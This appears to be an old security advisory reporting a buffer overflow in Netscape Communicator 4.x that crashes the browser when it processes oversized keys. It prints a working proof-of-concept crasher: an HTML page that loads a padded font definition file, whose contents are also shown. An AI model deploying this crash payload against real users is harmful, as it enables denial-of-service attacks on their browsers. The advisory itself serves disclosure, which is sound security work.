COMMAND

    netscape

SYSTEMS AFFECTED

    Netscape Communicator 4.x (Win32 and UNIX)

PROBLEM

    Michael Breuer  found following.   He found  a buffer  overflow in
    Netscape  Communicator  probably  affecting  all  versions.    The
    problem  occurs  when  Communicator  attempts  to validate any key
    where the key  length is >  2k.  Michael  tested this on  4.61 and
    4.7, unix (Irix) and Windows.

    As the problem manifests during the check of the key, any  portion
    of the key chain which has a key > 2k triggers the problem.  Thus,
    the  potential  for  widespread  DoS  attacks  via email.  Michael
    suspect, but has  not pursued, the  possibility of exploiting  the
    overflow to execute arbitrary code.

    For more information and a sample exploit see

        http://www.whitehats.com/browsers/maxvisioncrash47/index.html

    To jump over, here's the craching HTML code:

    <html><head><link rel="fontdef" src="CrashNetscape47-MaxVision.pfr"><title>Whitehats - Netscape 4.7 Crash</title></head>
    <body bgcolor="#FFFFFF" link="#000000">
    <font face="arial black, arial,san serif" size=5>bewm!@#$</font>
    </body></html>

    CrashNetscape47-MaxVision.pfr:

    MaxCrashingNetscapeDemonstration################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################Hi, what are you doing reading this?  I'm typing in the middle of a thousand 23's (that probably look like pound signs to most people).  Hm.  Get a life :)########################################################################################################################################################################################################################################################################################################################################################################################################################g23

SOLUTION

    Netscape has  been notified  of the  problem and  expect a fix for
    4.8.